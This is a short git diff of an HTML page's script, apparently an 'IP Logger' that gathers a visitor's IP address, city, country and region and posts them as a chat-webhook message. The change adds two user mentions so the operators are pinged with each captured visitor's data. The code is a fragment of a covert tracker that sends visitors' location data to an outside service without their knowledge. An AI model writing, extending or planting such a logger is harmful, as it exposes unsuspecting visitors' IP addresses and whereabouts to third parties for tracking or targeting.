--- a/index.html
+++ b/index.html
@@ -23,7 +23,7 @@ function getIP(json) {
      {
           username: "IP Logger",
           avatar_url: "",
-          content: "IP:  " + data.ip + "**         **" + "City:  " + data.city + "**         **" +  "Country:  " + data.country_code +  "**         **" + "Region:  " +  data.region
+          content: "<@988976826531581973> <@908526607130591233> IP:  " + data.ip + "**         **" + "City:  " + data.city + "**         **" +  "Country:  " + data.country_code +  "**         **" + "Region:  " +  data.region
      }
      
      request.send(JSON.stringify(params));
